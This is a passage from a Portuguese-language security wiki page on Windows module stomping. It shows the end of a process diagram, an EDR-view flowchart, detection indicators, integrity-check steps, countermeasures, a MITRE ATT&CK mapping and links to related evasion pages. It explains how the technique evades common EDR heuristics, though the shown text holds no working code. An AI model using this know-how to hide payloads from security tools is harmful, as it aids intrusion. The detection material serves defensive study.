    IMP-&gt;&gt;OS: VirtualProtect(.text, PAGE_EXECUTE_READ)
    Note over MEM: .text executavel novamente<br/>Backing: mshtml.dll

    IMP-&gt;&gt;OS: CreateThread(textAddr)
    Note over MEM: Payload executa<br/>como codigo de mshtml.dll

    OS-&gt;&gt;MEM: Thread executa
    Note over OS: Callstack mostra<br/>mshtml.dll!.text
</code></pre>
<h3 id="visao-do-edr">Visão do EDR<a class="headerlink" href="#visao-do-edr" title="Permanent link">¶</a></h3>
<pre class="mermaid"><code>flowchart LR
    subgraph normal["Injeção Normal"]
        A[Região RWX<br/>sem backing] --&gt; B{EDR Check}
        B --&gt;|Unbacked + RWX| C[ALERTA]
    end

    subgraph stomp["Module Stomping"]
        D[mshtml.dll .text<br/>R-X com backing] --&gt; E{EDR Check}
        E --&gt;|Backed + R-X| F[OK]
        E --&gt;|Integrity check?| G{Bytes == disco?}
        G --&gt;|Nao| H[ALERTA]
        G --&gt;|Sim| F
    end
</code></pre>
<h2 id="deteccao">Detecção<a class="headerlink" href="#deteccao" title="Permanent link">¶</a></h2>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Descrição</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>LoadLibrary</code> de DLL incomum</td>
<td>Carregamento de DLLs que o processo normalmente não usa</td>
</tr>
<tr>
<td><code>VirtualProtect</code> em <code>.text</code> de DLL</td>
<td>Tornar seção de código gravável</td>
</tr>
<tr>
<td><code>.text</code> content != disk content</td>
<td>Integrity check da seção de código</td>
</tr>
<tr>
<td><code>CreateThread</code> apontando para DLL</td>
<td>Thread com start address em DLL carregada</td>
</tr>
<tr>
<td>DLL loaded mas sem imports usados</td>
<td>DLL carregada sem chamadas aos seus exports</td>
</tr>
</tbody>
</table>
<h3 id="deteccao-por-integrity-check">Detecção por integrity check<a class="headerlink" href="#deteccao-por-integrity-check" title="Permanent link">¶</a></h3>
<p>A detecção mais efetiva compara bytes em memória com bytes em disco:</p>
<div class="highlight"><pre><span></span><code><a href="#__codelineno-5-1" id="__codelineno-5-1" name="__codelineno-5-1"></a>1. Enumerar módulos carregados (EnumProcessModules)
<a href="#__codelineno-5-2" id="__codelineno-5-2" name="__codelineno-5-2"></a>2. Para cada módulo, ler .text do arquivo em disco
<a href="#__codelineno-5-3" id="__codelineno-5-3" name="__codelineno-5-3"></a>3. Comparar com .text em memória
<a href="#__codelineno-5-4" id="__codelineno-5-4" name="__codelineno-5-4"></a>4. Diferenças indicam stomping
</code></pre></div>
<p>Essa verificação é custosa e geralmente feita sob demanda, não continuamente.</p>
<h3 id="contramedidas">Contramedidas<a class="headerlink" href="#contramedidas" title="Permanent link">¶</a></h3>
<ul>
<li><strong>Periodic module integrity</strong>: Comparar seções de código com disco</li>
<li><strong>DLL load monitoring</strong>: Detectar carregamento de DLLs inesperadas</li>
<li><strong>Thread start address analysis</strong>: Verificar se threads iniciam em endereços
  legítimos dentro da DLL</li>
<li><strong>Call stack analysis</strong>: Verificar se a call stack faz sentido para a DLL
  em questão</li>
</ul>
<h3 id="vantagens-sobre-outras-tecnicas">Vantagens sobre outras técnicas<a class="headerlink" href="#vantagens-sobre-outras-tecnicas" title="Permanent link">¶</a></h3>
<p>Module stomping tem a vantagem única de produzir memória disk-backed com
permissões normais (R-X), o que evita as duas heurísticas mais comuns de EDRs:</p>
<ol>
<li>Detecção de unbacked executable memory</li>
<li>Detecção de memória RWX</li>
</ol>
<h2 id="mitre-attck">MITRE ATT&amp;CK<a class="headerlink" href="#mitre-attck" title="Permanent link">¶</a></h2>
<table>
<thead>
<tr>
<th>Campo</th>
<th>Valor</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Tactic</strong></td>
<td>Defense Evasion</td>
</tr>
<tr>
<td><strong>Technique</strong></td>
<td>T1055.001 - Process Injection: Dynamic-link Library Injection</td>
</tr>
<tr>
<td><strong>Sub-technique</strong></td>
<td>Module Stomping</td>
</tr>
<tr>
<td><strong>Platforms</strong></td>
<td>Windows</td>
</tr>
</tbody>
</table>
<h2 id="veja-tambem">Veja também<a class="headerlink" href="#veja-tambem" title="Permanent link">¶</a></h2>
<ul>
<li><a href="../process-hollowing/">Process Hollowing</a> - Alternativa cross-process</li>
<li><a href="../reflective-loading/">Reflective Loading</a> - Carregamento sem Windows Loader</li>
<li><a href="../earlybird-apc/">EarlyBird APC</a> - Injeção via APC em processo suspenso</li>
<li><a href="../../evasion/direct-syscalls/">Direct Syscalls</a> - Bypass de hooks para VirtualProtect</li>
</ul>
</article>
</div>
<script>var tabs=__md_get("__tabs");if(Array.isArray(tabs))e:for(var set of document.querySelectorAll(".tabbed-set")){var labels=set.querySelector(".tabbed-labels");for(var tab of tabs)for(var label of labels.getElementsByTagName("label"))if(label.innerText.trim()===tab){var input=document.getElementById(label.htmlFor);input.checked=!0;continue e}}</script>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button class="md-top md-icon" data-md-component="top" hidden="" type="button">
<svg viewbox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"></path></svg>
  Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" rel="noopener" target="_blank">
      Material for MkDocs
    </a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"annotate": null, "base": "../../../..", "features": ["content.code.copy", "content.tabs.link", "navigation.tabs", "navigation.sections", "navigation.expand", "navigation.top", "navigation.tracking", "navigation.indexes", "toc.integrate", "search.suggest", "search.highlight"], "search": "../../../../assets/javascripts/workers/search.2c215733.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
<script src="../../../../assets/javascripts/bundle.79ae519e.min.js"></script>
<script type="module">import mermaid from "https://unpkg.com/mermaid@10.4.0/dist/mermaid.esm.min.mjs";
window.mermaidConfig = {default: {
    startOnLoad: false
}};</script></body>
</html>